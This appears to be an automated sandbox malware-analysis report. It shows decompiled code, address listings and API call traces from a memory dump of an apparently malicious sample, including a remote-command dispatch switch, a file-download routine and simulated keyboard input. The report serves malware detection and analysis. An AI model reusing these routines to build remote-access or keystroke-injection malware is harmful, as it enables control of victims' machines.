									__ecx = L00401E49( &_v424, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = L0040F69B();
									goto L120;
								case 0x28:
									__eax =  &_v404;
									__ebx = 0;
									__ecx =  &_v420;
									_v404 = 0;
									_v408 = 0;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__edx =  &_v412;
									__ecx = __eax;
									__eax = E00417111(__eax, __edx,  &_v404);
									__eflags = __eax - 1;
									if(__eax == 1) {
										__edx = _v404;
										__ecx = _v408;
										L0040F69B() = L004394F1(_v408);
										L26:
										_pop(__ecx);
									}
									goto L120;
								case 0x29:
									__eax = L0040A732(__edx);
									goto L120;
								case 0x2a:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = L00413CC0(__edx);
									goto L97;
								case 0x2b:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = L004117F1(__edx);
									goto L97;
								case 0x2c:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00405367(__edx);
									goto L97;
								case 0x2d:
									_push(__ecx);
									__esi = 0x46c560;
									__ecx = 0x46c560;
									__eax = E00402489();
									__ecx = 0x46c560;
									__eax = L00401F95(0x46c560);
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E49( &_v420, __edx, __eflags, 0);
									E00402489() = __eax + 1;
									__ecx =  &_v424;
									__ecx = L00401E49( &_v424, __edx, __eflags, 0);
									__eax = L00401F95(__eax);
									__ecx = 0x46c518;
									__edx = L00401F95(0x46c518);
									__eax = E00410C80(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
									goto L97;
								case 0x2e:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = L0040EE3B(__edx);
									goto L97;
								case 0x2f:
									__ecx =  &_v420;
									__eax = L00401E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = L00415B9C(__edx);
									L97:
									goto L120;
							}
						}
					}
				}
				L125:
			}































































                                    0x004123b9
                                    0x004123b9
                                    0x004123b9
                                    0x004123c9
                                    0x004123cb
                                    0x004123d3
                                    0x004123db
                                    0x004123f8
                                    0x00412402
                                    0x00412407
                                    0x00412412
                                    0x00412417
                                    0x00412424
                                    0x0041242d
                                    0x00412437
                                    0x0041243a
                                    0x0041243c
                                    0x004130ad
                                    0x004130b3
                                    0x004130b6
                                    0x004130c3
                                    0x00000000
                                    0x004130ef
                                    0x004130f8
                                    0x004130fa
                                    0x00413106
                                    0x00413108
                                    0x00000000
                                    0x00000000
                                    0x00413114
                                    0x0041311d
                                    0x0041311f
                                    0x00413125
                                    0x0041312d
                                    0x00413131
                                    0x00413138
                                    0x0041313a
                                    0x00413140
                                    0x00413142
                                    0x00413146
                                    0x0041314c
                                    0x00413150
                                    0x00413157
                                    0x0041315b
                                    0x0041315d
                                    0x00413162
                                    0x00413165
                                    0x00413168
                                    0x0041316d
                                    0x0041316f
                                    0x00413174
                                    0x00413177
                                    0x00413180
                                    0x00413182
                                    0x00413184
                                    0x00000000
                                    0x00000000
                                    0x00413214
                                    0x0041321d
                                    0x0041321f
                                    0x00413227
                                    0x00413230
                                    0x00413232
                                    0x0041323f
                                    0x00000000
                                    0x00000000
                                    0x0041328c
                                    0x00413290
                                    0x00413295
                                    0x00413298
                                    0x004132a0
                                    0x00000000
                                    0x00000000
                                    0x004132ac
                                    0x004132b0
                                    0x004132b5
                                    0x004132b8
                                    0x004132c0
                                    0x00000000
                                    0x00000000
                                    0x004130db
                                    0x004130e0
                                    0x00000000
                                    0x00000000
                                    0x0041324c
                                    0x00413250
                                    0x00413255
                                    0x00413258
                                    0x00413260
                                    0x00000000
                                    0x00000000
                                    0x0041326c
                                    0x00413270
                                    0x00413275
                                    0x00413278
                                    0x00413280
                                    0x00000000
                                    0x00000000
                                    0x00413350
                                    0x00000000
                                    0x00000000
                                    0x00413357
                                    0x00000000
                                    0x00000000
                                    0x0041335e
                                    0x00000000
                                    0x00000000
                                    0x00413321
                                    0x00413323
                                    0x0041332e
                                    0x00413330
                                    0x00413337
                                    0x0041333b
                                    0x0041333d
                                    0x00413340
                                    0x00413345
                                    0x00413347
                                    0x00413349
                                    0x00000000
                                    0x00000000
                                    0x004132ca
                                    0x00000000
                                    0x00000000
                                    0x00413365
                                    0x0041336c
                                    0x00413370
                                    0x00413372
                                    0x00413377
                                    0x0041337a
                                    0x0041337e
                                    0x00413380
                                    0x0041338d
                                    0x0041338f
                                    0x00413399
                                    0x0041339b
                                    0x0041339d
                                    0x004133a3
                                    0x00000000
                                    0x00000000
                                    0x004132d4
                                    0x004132db
                                    0x00413316
                                    0x004132dd
                                    0x004132dd
                                    0x004132df
                                    0x004132e4
                                    0x004132f0
                                    0x004132f6
                                    0x004132f6
                                    0x00000000
                                    0x00000000
                                    0x00413202
                                    0x00000000
                                    0x00000000
                                    0x00413209
                                    0x0041320b
                                    0x0041320c
                                    0x00000000
                                    0x00000000
                                    0x00413197
                                    0x0041319e
                                    0x004131a5
                                    0x004131a9
                                    0x004131ae
                                    0x004131b1
                                    0x004131b4
                                    0x004131bb
                                    0x004131bf
                                    0x004131c4
                                    0x004131c7
                                    0x004131ca
                                    0x004131d1
                                    0x004131d5
                                    0x004131da
                                    0x004131dd
                                    0x004131e0
                                    0x004131e5
                                    0x004131ec
                                    0x004131f1
                                    0x004131f8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004130c3
                                    0x00000000
                                    0x00412442
                                    0x00412442
                                    0x00412fbb
                                    0x00412fd8
                                    0x00412fe3
                                    0x00412fed
                                    0x00412ffd
                                    0x00412ffd
                                    0x00413000
                                    0x00413005
                                    0x0041300b
                                    0x00413016
                                    0x00413021
                                    0x0041303e
                                    0x0041305b
                                    0x00413067
                                    0x0041306c
                                    0x00413074
                                    0x00413097
                                    0x00413097
                                    0x004130a3
                                    0x00000000
                                    0x00412448
                                    0x00412448
                                    0x0041244c
                                    0x004133c4
                                    0x004133c4
                                    0x004133c8
                                    0x004133d4
                                    0x004133e0
                                    0x004133ed
                                    0x00412452
                                    0x00412454
                                    0x00000000
                                    0x00412467
                                    0x00412481
                                    0x0041249d
                                    0x004124f8
                                    0x004124fc
                                    0x00412507
                                    0x0041250b
                                    0x00412514
                                    0x00412520
                                    0x0041252c
                                    0x00412538
                                    0x00412544
                                    0x00412550
                                    0x0041255c
                                    0x00412565
                                    0x0041256e
                                    0x00412586
                                    0x0041258e
                                    0x004125bb
                                    0x004125c0
                                    0x004125c7
                                    0x004125cc
                                    0x004125ce
                                    0x004125d4
                                    0x004125d5
                                    0x00000000
                                    0x004125d5
                                    0x00412590
                                    0x00412592
                                    0x0041259c
                                    0x004125ac
                                    0x0041259e
                                    0x0041259f
                                    0x0041259f
                                    0x0041259c
                                    0x00000000
                                    0x00000000
                                    0x004125e1
                                    0x004125e3
                                    0x004125d7
                                    0x004125d7
                                    0x00000000
                                    0x00000000
                                    0x00412f50
                                    0x00412f54
                                    0x00412f59
                                    0x00412f5c
                                    0x00412f5e
                                    0x00412f60
                                    0x00412f65
                                    0x00412f67
                                    0x00412f6c
                                    0x00412f71
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004125f1
                                    0x004125f8
                                    0x004125fd
                                    0x00412600
                                    0x00412604
                                    0x00412606
                                    0x00412611
                                    0x00412613
                                    0x0041261d
                                    0x0041261f
                                    0x00412621
                                    0x00412627
                                    0x004133a8
                                    0x004133a8
                                    0x004133ad
                                    0x004133b2
                                    0x004133b6
                                    0x004133bb
                                    0x004133bf
                                    0x00000000
                                    0x00000000
                                    0x00412630
                                    0x00412639
                                    0x0041263b
                                    0x00412647
                                    0x00412649
                                    0x00000000
                                    0x00000000
                                    0x004126d1
                                    0x004126d1
                                    0x00000000
                                    0x00000000
                                    0x00412655
                                    0x0041265e
                                    0x00412660
                                    0x0041266d
                                    0x00000000
                                    0x00000000
                                    0x00412678
                                    0x00000000
                                    0x00000000
                                    0x0041269f
                                    0x0041267a
                                    0x0041267a
                                    0x0041267c
                                    0x0041267c
                                    0x00412685
                                    0x00412687
                                    0x00412694
                                    0x00000000
                                    0x00000000
                                    0x004126a3
                                    0x004126aa
                                    0x004126b3
                                    0x004126b5
                                    0x004126c2
                                    0x004126c8
                                    0x004126cc
                                    0x00000000
                                    0x00000000
                                    0x004126db
                                    0x004126dd
                                    0x004126e9
                                    0x004126eb
                                    0x004126f1
                                    0x004126f5
                                    0x004126fb
                                    0x00412700
                                    0x0041270a
                                    0x0041271d
                                    0x00412723
                                    0x00412727
                                    0x0041272c
                                    0x00000000
                                    0x00000000
                                    0x00412737
                                    0x0041273b
                                    0x00412741
                                    0x00412746
                                    0x0041274b
                                    0x00412751
                                    0x00412759
                                    0x0041275d
                                    0x00412762
                                    0x00412765
                                    0x0041276d
                                    0x00000000
                                    0x0041276d
                                    0x00000000
                                    0x00000000
                                    0x00412779
                                    0x0041277b
                                    0x00412787
                                    0x00412795
                                    0x00000000
                                    0x00000000
                                    0x004127a2
                                    0x004127a6
                                    0x004127ac
                                    0x004127b1
                                    0x004127b8
                                    0x004127c1
                                    0x004127c3
                                    0x004127cf
                                    0x004127d1
                                    0x004127d9
                                    0x004127e2
                                    0x004127e4
                                    0x004127ea
                                    0x004127f0
                                    0x004127f2
                                    0x004127f8
                                    0x004127f8
                                    0x004127f8
                                    0x00412800
                                    0x00412808
                                    0x0041280e
                                    0x00412810
                                    0x00412812
                                    0x00000000
                                    0x00000000
                                    0x0041281d
                                    0x00000000
                                    0x00000000
                                    0x0041282b
                                    0x0041282f
                                    0x00412834
                                    0x00412837
                                    0x0041283a
                                    0x0041283f
                                    0x00412844
                                    0x00000000
                                    0x00000000
                                    0x0041284e
                                    0x00412853
                                    0x00000000
                                    0x00000000
                                    0x0041285d
                                    0x00412862
                                    0x00000000
                                    0x00000000
                                    0x0041286e
                                    0x00412872
                                    0x00412878
                                    0x0041287d
                                    0x00412882
                                    0x00000000
                                    0x00000000
                                    0x00412891
                                    0x00412891
                                    0x00412897
                                    0x0041289d
                                    0x004128a2
                                    0x004128a5
                                    0x004128a8
                                    0x004128ad
                                    0x004128b2
                                    0x00000000
                                    0x00000000
                                    0x004128c2
                                    0x004128c7
                                    0x004128c9
                                    0x004128ce
                                    0x00412887
                                    0x00412887
                                    0x00000000
                                    0x00000000
                                    0x00412f9a
                                    0x00412fa0
                                    0x00412fa6
                                    0x00412fa8
                                    0x00412faa
                                    0x00412faa
                                    0x00000000
                                    0x00000000
                                    0x004128d2
                                    0x004128d4
                                    0x004128d9
                                    0x004128df
                                    0x004128e4
                                    0x004128e9
                                    0x004128ee
                                    0x004128f3
                                    0x004128f6
                                    0x004128fb
                                    0x004128fd
                                    0x004128fe
                                    0x004128ff
                                    0x00412900
                                    0x00412901
                                    0x00412906
                                    0x00412908
                                    0x0041290d
                                    0x00412910
                                    0x00412912
                                    0x00412917
                                    0x0041291d
                                    0x00412928
                                    0x0041291f
                                    0x0041291f
                                    0x00412924
                                    0x0041292f
                                    0x00412931
                                    0x0041293c
                                    0x0041293e
                                    0x00000000
                                    0x00000000
                                    0x00412948
                                    0x0041294e
                                    0x00412953
                                    0x00000000
                                    0x00000000
                                    0x0041295d
                                    0x0041295f
                                    0x00412965
                                    0x0041296b
                                    0x00412970
                                    0x00412973
                                    0x00412976
                                    0x0041297d
                                    0x00412986
                                    0x00412988
                                    0x00412994
                                    0x00412997
                                    0x004129a0
                                    0x004129a2
                                    0x004129a8
                                    0x004129af
                                    0x004129b3
                                    0x004129ba
                                    0x004129bc
                                    0x004129c2
                                    0x004129c8
                                    0x004129ca
                                    0x004129cc
                                    0x00000000
                                    0x00000000
                                    0x004129df
                                    0x004129f2
                                    0x00000000
                                    0x00000000
                                    0x004129fd
                                    0x00412a03
                                    0x00412a09
                                    0x00412a0e
                                    0x00412a11
                                    0x00412a14
                                    0x00412a1b
                                    0x00412a1f
                                    0x00412a24
                                    0x00412a27
                                    0x00412a2f
                                    0x00412a34
                                    0x004128b7
                                    0x004128b7
                                    0x00000000
                                    0x00000000
                                    0x00412a3e
                                    0x00412a47
                                    0x00412a4f
                                    0x00000000
                                    0x00000000
                                    0x00412a5a
                                    0x00412a61
                                    0x00000000
                                    0x00000000
                                    0x00412a6f
                                    0x00412a6f
                                    0x00412a75
                                    0x00412a67
                                    0x00412a69
                                    0x00000000
                                    0x00412a69
                                    0x004133f0
                                    0x004133f5
                                    0x004133f6
                                    0x004133f8
                                    0x004133fa
                                    0x004133ff
                                    0x00413400
                                    0x00413402
                                    0x00413405
                                    0x00413407
                                    0x00413408
                                    0x0041340a
                                    0x0041340f
                                    0x00413410
                                    0x00413412
                                    0x00413414
                                    0x00413417
                                    0x00413418
                                    0x0041341b
                                    0x0041341c
                                    0x00413422
                                    0x00413424
                                    0x00413426
                                    0x00413428
                                    0x0041342e
                                    0x0041342f
                                    0x00413430
                                    0x00413436
                                    0x00413439
                                    0x0041343b
                                    0x0041343c
                                    0x0041343f
                                    0x00413440
                                    0x00413443
                                    0x00413444
                                    0x00413448
                                    0x0041344e
                                    0x00413451
                                    0x00413458
                                    0x0041345a
                                    0x0041345d
                                    0x0041345f
                                    0x00413460
                                    0x00413463
                                    0x00413464
                                    0x00413467
                                    0x00413468
                                    0x0041346a
                                    0x0041346d
                                    0x0041346e
                                    0x00413471
                                    0x00413473
                                    0x00413474
                                    0x00413477
                                    0x00413478
                                    0x0041347b
                                    0x0041347c
                                    0x00413480
                                    0x00413486
                                    0x00413489
                                    0x0041348b
                                    0x0041348c
                                    0x0041348e
                                    0x00413491
                                    0x00413497
                                    0x00413498
                                    0x0041349b
                                    0x0041349c
                                    0x0041349e
                                    0x004134a3
                                    0x004134a4
                                    0x004134a7
                                    0x004134a8
                                    0x004134ab
                                    0x004134ac
                                    0x004134b2
                                    0x004134b4
                                    0x004134b6
                                    0x004134b8
                                    0x004134ba
                                    0x004134bb
                                    0x004134bc
                                    0x004134be
                                    0x004134be
                                    0x004134c1
                                    0x004134c3
                                    0x004134c4
                                    0x004134c6
                                    0x004134c9
                                    0x004134cb
                                    0x004134cc
                                    0x004134ce
                                    0x004134d1
                                    0x004134d3
                                    0x004134d4
                                    0x004134da
                                    0x004134dd
                                    0x004134de
                                    0x004134e1
                                    0x004134e3
                                    0x004134e4
                                    0x004134e7
                                    0x004134e8
                                    0x004134eb
                                    0x004134ec
                                    0x004134ef
                                    0x004134f0
                                    0x004134f0
                                    0x004134f0
                                    0x004134f2
                                    0x004134f5
                                    0x004134f8
                                    0x004134fb
                                    0x004134fc
                                    0x004134fe
                                    0x00413501
                                    0x00413503
                                    0x00413504
                                    0x00413506
                                    0x00413509
                                    0x00413509
                                    0x00413509
                                    0x0041350a
                                    0x0041350d
                                    0x0041350f
                                    0x00413510
                                    0x00413512
                                    0x00413514
                                    0x00413516
                                    0x00413518
                                    0x0041351a
                                    0x0041351b
                                    0x0041351c
                                    0x0041351e
                                    0x00413520
                                    0x00413522
                                    0x00413524
                                    0x00413526
                                    0x00413528
                                    0x0041352a
                                    0x0041352c
                                    0x00413531
                                    0x00413533
                                    0x00413534
                                    0x00413535
                                    0x00413539
                                    0x00413541
                                    0x00413543
                                    0x00413544
                                    0x00000000
                                    0x00000000
                                    0x00412a7c
                                    0x00000000
                                    0x00000000
                                    0x00412a8e
                                    0x00412a8e
                                    0x00412a94
                                    0x00000000
                                    0x00000000
                                    0x00412a88
                                    0x00412a88
                                    0x00412a96
                                    0x00412a98
                                    0x00412aa2
                                    0x00412aa4
                                    0x00412aab
                                    0x00412aaf
                                    0x00412ab6
                                    0x00412ab8
                                    0x00412abd
                                    0x00412abf
                                    0x00412ac4
                                    0x00412aca
                                    0x00412acb
                                    0x00412acc
                                    0x00412ad5
                                    0x00412ad8
                                    0x00412ae1
                                    0x00412ae3
                                    0x00412ae8
                                    0x00412ae9
                                    0x00412aea
                                    0x00412af0
                                    0x00412af2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00412b1c
                                    0x00412b1c
                                    0x00412b22
                                    0x00000000
                                    0x00000000
                                    0x00412b16
                                    0x00412b16
                                    0x00412b26
                                    0x00412b2f
                                    0x00412b31
                                    0x00412b38
                                    0x00412b3c
                                    0x00412b43
                                    0x00412b45
                                    0x00412b4a
                                    0x00412b4c
                                    0x00412b51
                                    0x00412b57
                                    0x00412b5b
                                    0x00412b62
                                    0x00412b66
                                    0x00412b68
                                    0x00412b6d
                                    0x00412b70
                                    0x00412b73
                                    0x00412b78
                                    0x00412b7a
                                    0x00412b7f
                                    0x00412b82
                                    0x00412b84
                                    0x00412af8
                                    0x00412af8
                                    0x00412afb
                                    0x00412aff
                                    0x00412b07
                                    0x00412b0c
                                    0x00412b0c
                                    0x00000000
                                    0x00000000
                                    0x00412b91
                                    0x00412b9a
                                    0x00412b9c
                                    0x00412ba8
                                    0x00412bad
                                    0x00412bb9
                                    0x00412bbb
                                    0x00412bc1
                                    0x00412bc3
                                    0x00412bcd
                                    0x00412bd6
                                    0x00000000
                                    0x00000000
                                    0x00412be1
                                    0x00412be6
                                    0x00412be8
                                    0x00412bed
                                    0x00412bf2
                                    0x00412bf7
                                    0x00412bf9
                                    0x00412bfe
                                    0x00412c02
                                    0x00412c03
                                    0x00412c05
                                    0x00412c1d
                                    0x00412c22
                                    0x00412c27
                                    0x00412c29
                                    0x00412c2e
                                    0x00412c32
                                    0x00412c33
                                    0x00412c35
                                    0x00412c50
                                    0x00412c55
                                    0x00412c5a
                                    0x00412c5c
                                    0x00412c61
                                    0x00412c63
                                    0x00412c98
                                    0x00412c9f
                                    0x00412ca6
                                    0x00412caa
                                    0x00412cac
                                    0x00412cb1
                                    0x00412cb6
                                    0x00412cb8
                                    0x00412cbd
                                    0x00412cbe
                                    0x00412cc0
                                    0x00412cc6
                                    0x00412cca
                                    0x00412ccf
                                    0x00412cd4
                                    0x00412cd6
                                    0x00412cdb
                                    0x00412cdd
                                    0x00412ce3
                                    0x00412ce4
                                    0x00412ce5
                                    0x00000000
                                    0x00412ce5
                                    0x00412cc2
                                    0x00412cc2
                                    0x00412cc3
                                    0x00412ce7
                                    0x00412ce7
                                    0x00412ce7
                                    0x00412c65
                                    0x00412c65
                                    0x00412c68
                                    0x00412c71
                                    0x00412c73
                                    0x00412c79
                                    0x00412c7e
                                    0x00412c7e
                                    0x00000000
                                    0x00412c7e
                                    0x00412c37
                                    0x00412c3e
                                    0x00412c40
                                    0x00412c46
                                    0x00412c4b
                                    0x00000000
                                    0x00412c4b
                                    0x00412c07
                                    0x00412c0e
                                    0x00412c10
                                    0x00412c16
                                    0x00412c81
                                    0x00412c81
                                    0x00412c83
                                    0x00412c83
                                    0x00000000
                                    0x00000000
                                    0x00412d88
                                    0x00412d89
                                    0x00412d8f
                                    0x00412d91
                                    0x00412d9f
                                    0x00412da9
                                    0x00412db1
                                    0x00412db7
                                    0x00412dbe
                                    0x00412dc2
                                    0x00412dc6
                                    0x00412dcb
                                    0x00412dce
                                    0x00412dd2
                                    0x00412dd4
                                    0x00412dd9
                                    0x00412ddb
                                    0x00412de0
                                    0x00413189
                                    0x00413189
                                    0x0041318d
                                    0x0041318d
                                    0x0041318d
                                    0x00000000
                                    0x00000000
                                    0x00412cf5
                                    0x00412cf7
                                    0x00412cfd
                                    0x00412d04
                                    0x00412d0d
                                    0x00412d0f
                                    0x00412d14
                                    0x00412d23
                                    0x00412d26
                                    0x00412d2d
                                    0x00412d31
                                    0x00412d38
                                    0x00412d3a
                                    0x00412d41
                                    0x00412d4a
                                    0x00412d65
                                    0x00000000
                                    0x00412d65
                                    0x00000000
                                    0x00000000
                                    0x00412d6e
                                    0x00412d74
                                    0x00412d76
                                    0x00412d7c
                                    0x00412d82
                                    0x00412d82
                                    0x00000000
                                    0x00412d82
                                    0x00000000
                                    0x00000000
                                    0x00412dea
                                    0x00412dec
                                    0x00412df6
                                    0x00412df8
                                    0x00412dfe
                                    0x00412e02
                                    0x00412e09
                                    0x00412e0b
                                    0x00412e10
                                    0x00412e12
                                    0x00412e14
                                    0x00000000
                                    0x00000000
                                    0x00412e1e
                                    0x00412e22
                                    0x00412e26
                                    0x00412e2a
                                    0x00412e2e
                                    0x00412e37
                                    0x00412e39
                                    0x00412e3e
                                    0x00412e42
                                    0x00412e44
                                    0x00412e4a
                                    0x00412e4d
                                    0x00412e53
                                    0x00412e57
                                    0x00412e64
                                    0x00412817
                                    0x00412817
                                    0x00412817
                                    0x00000000
                                    0x00000000
                                    0x00412e6e
                                    0x00000000
                                    0x00000000
                                    0x00412e7a
                                    0x00412e7e
                                    0x00412e83
                                    0x00412e86
                                    0x00412e8e
                                    0x00000000
                                    0x00000000
                                    0x00412e9a
                                    0x00412e9e
                                    0x00412ea3
                                    0x00412ea6
                                    0x00412eae
                                    0x00000000
                                    0x00000000
                                    0x00412eba
                                    0x00412ebe
                                    0x00412ec3
                                    0x00412ec6
                                    0x00412ece
                                    0x00000000
                                    0x00000000
                                    0x00412ed8
                                    0x00412ed9
                                    0x00412ede
                                    0x00412ee0
                                    0x00412ee6
                                    0x00412ee8
                                    0x00412eee
                                    0x00412ef0
                                    0x00412efa
                                    0x00412f01
                                    0x00412f02
                                    0x00412f0d
                                    0x00412f0f
                                    0x00412f1a
                                    0x00412f24
                                    0x00412f26
                                    0x00000000
                                    0x00000000
                                    0x00412f32
                                    0x00412f36
                                    0x00412f3b
                                    0x00412f3e
                                    0x00412f46
                                    0x00000000
                                    0x00000000
                                    0x00412f7c
                                    0x00412f80
                                    0x00412f85
                                    0x00412f88
                                    0x00412f90
                                    0x004130e5
                                    0x00000000
                                    0x00000000
                                    0x00412454
                                    0x0041244c
                                    0x00412442
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CountEventTick
                                    • String ID: 8E@
                                    • API String ID: 180926312-787191786
                                    • Opcode ID: a2747b3eb99a265ea1a7242231bca69a4225098167f95aa3a6dfd7fc5bed8964
                                    • Instruction ID: ea4d81ed4f091483c47e61d79a68d374cc238c57229b35d0877b3eec111e029e
                                    • Opcode Fuzzy Hash: a2747b3eb99a265ea1a7242231bca69a4225098167f95aa3a6dfd7fc5bed8964
                                    • Instruction Fuzzy Hash: A0E183316083019BC614FB72D957AEE72A89B95708F40083FF546B71E2EE7C9A44879F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004062D8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E004062D8(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				L00450D30();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E0040331A(0,  &_v48, __eflags, L00407514( &_v72,  &_a12, __eflags, L".part"));
				L00401EF0();
				_t37 = CreateFileW(L00401EEB( &_v48), 4, 0, 0, 2, 0x80, 0);
				_v20 = _t37;
				_t84 = _v8 - _a8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = L00401EEB( &_a12);
					MoveFileW(L00401EEB( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = L00404B5A( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E004020AB(_t58, _t82, _t74, _t85,  &_v12, 8);
								L00404AA4(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(L00401EEB( &_v48));
						}
					}
				}
				L9:
				L00401EF0();
				L00401EF0();
				return _t58;
			}





















                                    0x004062e0
                                    0x004062e9
                                    0x004062ed
                                    0x004062f0
                                    0x004062f3
                                    0x004062f5
                                    0x00406302
                                    0x0040630f
                                    0x00406317
                                    0x00406331
                                    0x0040633a
                                    0x0040633d
                                    0x00406340
                                    0x004063b2
                                    0x004063b3
                                    0x004063bc
                                    0x004063cb
                                    0x004063d1
                                    0x00406342
                                    0x00406342
                                    0x00406345
                                    0x00000000
                                    0x00406347
                                    0x00406347
                                    0x0040634a
                                    0x00000000
                                    0x0040634c
                                    0x0040634c
                                    0x0040634c
                                    0x0040635b
                                    0x00406360
                                    0x00406362
                                    0x00406363
                                    0x0040636a
                                    0x00406379
                                    0x0040637f
                                    0x0040638a
                                    0x00406394
                                    0x0040639b
                                    0x00000000
                                    0x00000000
                                    0x004063a3
                                    0x004063a6
                                    0x00000000
                                    0x004063af
                                    0x004063af
                                    0x00000000
                                    0x004063af
                                    0x00000000
                                    0x004063a6
                                    0x004063ef
                                    0x004063fe
                                    0x004063fe
                                    0x0040634a
                                    0x00406345
                                    0x004063d3
                                    0x004063d6
                                    0x004063de
                                    0x004063eb

                                    APIs
                                      • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00406331
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00406379
                                    • CloseHandle.KERNEL32(00000000), ref: 004063B3
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
                                    • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 004063EF
                                    • DeleteFileW.KERNEL32(00000000), ref: 004063FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                    • String ID: .part
                                    • API String ID: 820096542-3499674018
                                    • Opcode ID: 61f00ebc981dcbd3d513c34f629b1bb9fdab8b276104d41d54acbb6e0a66a52a
                                    • Instruction ID: 68dcce1d93323748b1337c278f552d509b85ae635904d8fd02d733045cb5952f
                                    • Opcode Fuzzy Hash: 61f00ebc981dcbd3d513c34f629b1bb9fdab8b276104d41d54acbb6e0a66a52a
                                    • Instruction Fuzzy Hash: E3314F71D00219ABCB00EFA5CC959EEB77DEF44345F10857AFD11B3191DA786A44CBA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00415288, Relevance: 12.1, APIs: 8, Instructions: 101keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 004152BC
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152DA
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 004152F7
                                    • SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00415309
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 00415320
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 0041533D
                                    • SendInput.USER32(00000001,00000001,0000001C), ref: 00415359
                                    • SendInput.USER32(00000001,?,0000001C,?), ref: 00415376
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: InputSend
                                    • String ID:
                                    • API String ID: 3431551938-0
                                    • Opcode ID: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                                    • Instruction ID: e5dbb7d03718becac2084a9070c23a21e9d5ec01c3d02bef7d0779bca3f6509f
                                    • Opcode Fuzzy Hash: 6ea3bd92fbcbdd2c947ef4f77b83900cac562dc86d2446edd88204e41788982f
                                    • Instruction Fuzzy Hash: 96311E72D9025CA9FB109BD1CC46FFFBB78AF58B14F04000AE604AB1C2D6F995858BE5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00410305, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 374filesleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 94%
                                    			E00410305(void* __eflags, void* _a4, char _a28, char _a52, char _a76, char _a100) {
				char _v5;
				char _v6;
				char _v7;
				char _v12;
				char _v36;
